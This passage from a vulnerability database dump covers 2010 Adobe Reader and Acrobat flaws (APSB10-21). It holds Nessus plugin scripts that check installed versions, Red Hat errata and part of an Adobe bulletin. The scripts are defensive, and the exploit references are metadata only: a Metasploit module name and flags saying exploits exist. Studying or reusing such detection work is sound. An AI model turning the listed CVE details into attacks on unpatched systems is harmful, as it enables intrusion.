script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/09/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0743\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-9.4.0-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-plugin-9.4.0-1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-9.4.0-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-plugin-9.4.0-1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-plugin\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:14:24", "description": "The version of Adobe Reader installed on the remote host is\nearlier than 9.4 / 8.2.5. Such versions are affected by multiple\ncode execution vulnerabilities.\n\nNote that there have been reports that one or more of these issues\nare being actively exploited in the wild.", "edition": 27, "published": "2010-09-09T00:00:00", "title": "Adobe Reader < 9.4 / 8.2.5 Multiple Vulnerabilities (APSB10-21)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-2888", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "ADOBE_READER_APSA10-02.NASL", "href": "https://www.tenable.com/plugins/nessus/49173", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49173);\n script_version(\"1.28\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_xref(name:\"CERT\", value:\"491991\");\n script_xref(name:\"Secunia\", value:\"41340\");\n\n script_name(english:\"Adobe Reader < 9.4 / 8.2.5 Multiple Vulnerabilities (APSB10-21)\");\n script_summary(english:\"Checks version of Adobe Reader\");\n\n script_cve_id(\n \"CVE-2010-2883\",\n \"CVE-2010-2884\",\n \"CVE-2010-2888\",\n \"CVE-2010-2889\",\n \"CVE-2010-2890\",\n \"CVE-2010-3619\",\n \"CVE-2010-3620\",\n \"CVE-2010-3621\",\n \"CVE-2010-3622\",\n \"CVE-2010-3625\",\n \"CVE-2010-3626\",\n \"CVE-2010-3627\",\n \"CVE-2010-3628\",\n \"CVE-2010-3629\",\n \"CVE-2010-3630\",\n \"CVE-2010-3632\",\n \"CVE-2010-3656\",\n \"CVE-2010-3657\",\n \"CVE-2010-3658\"\n );\n script_bugtraq_id(\n 43057,\n 43205,\n 43722,\n 43723,\n 43724,\n 43725,\n 43726,\n 43727,\n 43729,\n 43730,\n 43732,\n 43734,\n 43735,\n 43737,\n 43738,\n 43739,\n 43741,\n 43744,\n 43746\n );\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader on the remote Windows host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\",value:\n\"The version of Adobe Reader installed on the remote host is\nearlier than 9.4 / 8.2.5. Such versions are affected by multiple\ncode execution vulnerabilities.\n\nNote that there have been reports that one or more of these issues\nare being actively exploited in the wild.\");\n # http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ac085b0c\");\n # https://isc.sans.edu/diary/Adobe+AcrobatReader+0-day+in+Wild%2C+Adobe+Issues+Advisory/9523\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9783f73a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/advisories/apsa10-02.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-21.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader 9.4 / 8.2.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-971\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:'Windows');\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies('adobe_reader_installed.nasl');\n script_require_keys('SMB/Acroread/Version');\n exit(0);\n}\n\ninclude('global_settings.inc');\n\ninfo = '';\ninfo2 = '';\nvuln = 0;\nvers = get_kb_list('SMB/Acroread/Version');\nif (isnull(vers)) exit(0, 'The \"SMB/Acroread/Version\" KB list is missing.');\n\nforeach version (vers)\n{\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n path = get_kb_item('SMB/Acroread/'+version+'/Path');\n if (isnull(path)) path = 'n/a';\n\n verui = get_kb_item('SMB/Acroread/'+version+'/Version_UI');\n if (isnull(verui)) verui = version;\n\n if ( ver[0] < 8 ||\n (ver[0] == 8 && ver[1] < 2) ||\n (ver[0] == 8 && ver[1] == 2 && ver[2] < 5) ||\n (ver[0] == 9 && ver[1] < 4)\n )\n {\n vuln++;\n info += '\\n Path : '+path+\n '\\n Installed version : '+verui+ \n '\\n Fixed version : 9.4 / 8.2.5\\n';\n }\n else\n info2 += \" and \" + verui;\n}\n\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Adobe Reader are\";\n else s = \" of Adobe Reader is\";\n\n report =\n '\\nThe following vulnerable instance'+s+' installed on the'+\n '\\nremote host :\\n'+\n info;\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n\n exit(0);\n}\n\nif (info2) \n{\n info2 -= \" and \";\n if (\" and \" >< info2) be = \"are\";\n else be = \"is\";\n\n exit(0, \"The host is not affected since Adobe Reader \"+info2+\" \"+be+\" installed.\");\n}\nelse exit(1, \"Unexpected error - 'info2' is empty.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:13:01", "description": "The version of Adobe Acrobat installed on the remote host is\nearlier than 9.4 / 8.2.5. Such versions are affected by\nmultiple code execution vulnerabilities.\n\nNote that there have been reports that one or more of these issues\nare being actively exploited in the wild.", "edition": 27, "published": "2010-09-09T00:00:00", "title": "Adobe Acrobat < 9.4 / 8.2.5 Multiple Vulnerabilities (APSB10-21)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-2888", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSA10-02.NASL", "href": "https://www.tenable.com/plugins/nessus/49172", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49172);\n script_version(\"1.26\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_xref(name:\"CERT\", value:\"491991\");\n script_xref(name:\"Secunia\", value:\"41340\");\n\n script_name(english:\"Adobe Acrobat < 9.4 / 8.2.5 Multiple Vulnerabilities (APSB10-21)\");\n script_summary(english:\"Checks version of Adobe Acrobat\");\n\n script_cve_id(\n \"CVE-2010-2883\",\n \"CVE-2010-2884\",\n \"CVE-2010-2888\",\n \"CVE-2010-2889\",\n \"CVE-2010-2890\",\n \"CVE-2010-3619\",\n \"CVE-2010-3620\",\n \"CVE-2010-3621\",\n \"CVE-2010-3622\",\n \"CVE-2010-3625\",\n \"CVE-2010-3626\",\n \"CVE-2010-3627\",\n \"CVE-2010-3628\",\n \"CVE-2010-3629\",\n \"CVE-2010-3630\",\n \"CVE-2010-3632\",\n \"CVE-2010-3656\",\n \"CVE-2010-3657\",\n \"CVE-2010-3658\"\n );\n script_bugtraq_id(\n 43057,\n 43205,\n 43722,\n 43723,\n 43724,\n 43725,\n 43726,\n 43727,\n 43729,\n 43730,\n 43732,\n 43734,\n 43735,\n 43737,\n 43738,\n 43739,\n 43741,\n 43744,\n 43746\n );\n\n script_set_attribute(attribute:\"synopsis\",value:\n\"The version of Adobe Acrobat on the remote Windows host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\",value:\n\"The version of Adobe Acrobat installed on the remote host is\nearlier than 9.4 / 8.2.5. Such versions are affected by\nmultiple code execution vulnerabilities.\n\nNote that there have been reports that one or more of these issues\nare being actively exploited in the wild.\");\n # http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ac085b0c\");\n # https://isc.sans.edu/diary/Adobe+AcrobatReader+0-day+in+Wild%2C+Adobe+Issues+Advisory/9523\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9783f73a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/advisories/apsa10-02.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-21.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat 9.4 / 8.2.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-971\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/09\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:'Windows');\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_dependencies('adobe_acrobat_installed.nasl');\n script_require_keys('SMB/Acrobat/Version');\n exit(0);\n}\n\n\ninclude('global_settings.inc');\n\nversion = get_kb_item('SMB/Acrobat/Version');\nif (isnull(version)) exit(1, \"The 'SMB/Acrobat/Version' KB item is missing.\");\nversion_ui = get_kb_item('SMB/Acrobat/Version_UI');\n\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui;\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif ( ver[0] < 8 ||\n (ver[0] == 8 && ver[1] < 2) ||\n (ver[0] == 8 && ver[1] == 2 && ver[2] < 5) ||\n (ver[0] == 9 && ver[1] < 4)\n)\n{\n if (report_verbosity > 0)\n {\n path = get_kb_item('SMB/Acrobat/Path');\n if (isnull(path)) path = 'n/a';\n\n report =\n '\\n Product : Adobe Acrobat'+\n '\\n Path : '+path+\n '\\n Installed version : '+version_report+ \n '\\n Fixed version : 9.4 / 8.2.5\\n';\n security_hole(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_hole(get_kb_item('SMB/transport'));\n}\nelse exit(0, \"The host is not affected since Adobe Acrobat \"+version_report+\" is installed.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:52:43", "description": "The remote host is affected by the vulnerability described in GLSA-201101-08\n(Adobe Reader: Multiple vulnerabilities)\n\n Multiple vulnerabilities were discovered in Adobe Reader. For further\n information please consult the CVE entries and the Adobe Security\n Bulletins referenced below.\n \nImpact :\n\n A remote attacker might entice a user to open a specially crafted PDF\n file, possibly resulting in the execution of arbitrary code with the\n privileges of the user running the application, or a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 22, "published": "2011-01-24T00:00:00", "title": "GLSA-201101-08 : Adobe Reader: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4091", "CVE-2010-2887", "CVE-2010-3654", "CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "modified": "2011-01-24T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:acroread"], "id": "GENTOO_GLSA-201101-08.NASL", "href": "https://www.tenable.com/plugins/nessus/51657", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201101-08.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51657);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-2883\", \"CVE-2010-2884\", \"CVE-2010-2887\", \"CVE-2010-2889\", \"CVE-2010-2890\", \"CVE-2010-3619\", \"CVE-2010-3620\", \"CVE-2010-3621\", \"CVE-2010-3622\", \"CVE-2010-3625\", \"CVE-2010-3626\", \"CVE-2010-3627\", \"CVE-2010-3628\", \"CVE-2010-3629\", \"CVE-2010-3630\", \"CVE-2010-3632\", \"CVE-2010-3654\", \"CVE-2010-3656\", \"CVE-2010-3657\", \"CVE-2010-3658\", \"CVE-2010-4091\");\n script_bugtraq_id(43057, 43205, 43722, 43723, 43724, 43725, 43726, 43727, 43729, 43730, 43732, 43734, 43735, 43737, 43738, 43740, 43741, 43744, 43746, 44504, 44638);\n script_xref(name:\"GLSA\", value:\"201101-08\");\n\n script_name(english:\"GLSA-201101-08 : Adobe Reader: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201101-08\n(Adobe Reader: Multiple vulnerabilities)\n\n Multiple vulnerabilities were discovered in Adobe Reader. For further\n information please consult the CVE entries and the Adobe Security\n Bulletins referenced below.\n \nImpact :\n\n A remote attacker might entice a user to open a specially crafted PDF\n file, possibly resulting in the execution of arbitrary code with the\n privileges of the user running the application, or a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb10-21.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb10-28.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201101-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Reader users should upgrade to the latest stable version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/acroread-9.4.1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-971\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-text/acroread\", unaffected:make_list(\"ge 9.4.1\"), vulnerable:make_list(\"lt 9.4.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Reader\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:02", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2883", "CVE-2010-2884", "CVE-2010-2887", "CVE-2010-2889", "CVE-2010-2890", "CVE-2010-3619", "CVE-2010-3620", "CVE-2010-3621", "CVE-2010-3622", "CVE-2010-3625", "CVE-2010-3626", "CVE-2010-3627", "CVE-2010-3628", "CVE-2010-3629", "CVE-2010-3630", "CVE-2010-3632", "CVE-2010-3656", "CVE-2010-3657", "CVE-2010-3658"], "description": "Adobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nThis update fixes multiple vulnerabilities in Adobe Reader. These\nvulnerabilities are detailed on the Adobe security page APSB10-21, listed\nin the References section.\n\nA specially-crafted PDF file could cause Adobe Reader to crash or,\npotentially, execute arbitrary code as the user running Adobe Reader when\nopened. (CVE-2010-2883, CVE-2010-2884, CVE-2010-2889, CVE-2010-2890,\nCVE-2010-3619, CVE-2010-3620, CVE-2010-3621, CVE-2010-3622, CVE-2010-3625,\nCVE-2010-3626, CVE-2010-3627, CVE-2010-3628, CVE-2010-3629, CVE-2010-3630,\nCVE-2010-3632, CVE-2010-3658)\n\nAn insecure relative RPATH (runtime library search path) set in some Adobe\nReader libraries could allow a local attacker, who is able to convince\nanother user to run Adobe Reader in an attacker-controlled directory, to\nexecute arbitrary code with the privileges of the victim. (CVE-2010-2887)\n\nA specially-crafted PDF file could cause Adobe Reader to crash when opened.\n(CVE-2010-3656, CVE-2010-3657)\n\nAll Adobe Reader users should install these updated packages. They contain\nAdobe Reader version 9.4, which is not vulnerable to these issues. All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.\n", "modified": "2017-09-08T11:51:07", "published": "2010-10-06T04:00:00", "id": "RHSA-2010:0743", "href": "https://access.redhat.com/errata/RHSA-2010:0743", "type": "redhat", "title": "(RHSA-2010:0743) Critical: acroread security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:35:50", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2884"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed on the Adobe security page APSB10-22, listed in\nthe References section. If a victim loaded a page containing\nspecially-crafted SWF content, it could cause flash-plugin to crash or,\npotentially, execute arbitrary code. (CVE-2010-2884)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.1.85.3 for users of Red Hat Enterprise\nLinux 5 Supplementary, and version 9.0.283 for users of Red Hat Enterprise\nLinux 3 and 4 Extras.\n", "modified": "2017-09-08T11:58:29", "published": "2010-09-21T04:00:00", "id": "RHSA-2010:0706", "href": "https://access.redhat.com/errata/RHSA-2010:0706", "type": "redhat", "title": "(RHSA-2010:0706) Critical: flash-plugin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:36", "bulletinFamily": "software", "cvelist": ["CVE-2010-2887", "CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3624", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-2888", "CVE-2010-3623", "CVE-2010-3631", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "description": " Security updates available for Adobe Reader and Acrobat\r\n\r\nRelease date: October 5, 2010\r\n\r\nVulnerability identifier: APSB10-21\r\n\r\nCVE Numbers: CVE-2010-2883, CVE-2010-2884, CVE-2010-2887, CVE-2010-2888,\r\nCVE-2010-2889, CVE-2010-2890, CVE-2010-3619, CVE-2010-3620, CVE-2010-3621,\r\nCVE-2010-3622, CVE-2010-3623, CVE-2010-3624, CVE-2010-3625, CVE-2010-3626,\r\nCVE-2010-3627, CVE-2010-3628, CVE-2010-3629, CVE-2010-3630, CVE-2010-3631,\r\nCVE-2010-3632, CVE-2010-3656, CVE-2010-3657, CVE-2010-3658\r\n\r\nPlatform: All Platforms\r\nSummary\r\n\r\nCritical vulnerabilities have been identified in Adobe Reader 9.3.4 (and earlier versions) for\r\nWindows, Macintosh and UNIX, Adobe Acrobat 9.3.4 (and earlier versions) for Windows and\r\nMacintosh, and Adobe Reader 8.2.4 (and earlier versions) and Adobe Acrobat 8.2.4 (and earlier\r\nversions) for Windows and Macintosh. These vulnerabilities, including CVE-2010-2883,\r\nreferenced in Security Advisory APSA10-02, and CVE-2010-2884 referenced in the Adobe Flash\r\nPlayer Security Bulletin APSB10-22, could cause the application to crash and could potentially\r\nallow an attacker to take control of the affected system.\r\n\r\nAdobe recommends users of Adobe Reader 9.3.4 and earlier versions for Windows, Macintosh\r\nand UNIX update to Adobe Reader 9.4. (For Adobe Reader users on Windows and Macintosh,\r\nwho cannot update to Adobe Reader 9.4, Adobe has provided the Adobe Reader 8.2.5 update.)\r\nAdobe recommends users of Adobe Acrobat 9.3.4 and earlier versions for Windows and\r\nMacintosh update to Adobe Acrobat 9.4. Adobe recommends users of Adobe Acrobat 8.2.4 and\r\nearlier versions for Windows and Macintosh update to Adobe Acrobat 8.2.5.\r\n\r\nNote that the October 5, 2010 updates represent an accelerated release of the next quarterly\r\nsecurity update originally scheduled for October 12, 2010. With this accelerated schedule, Adobe\r\nwill not release additional updates for Adobe Reader and Acrobat on October 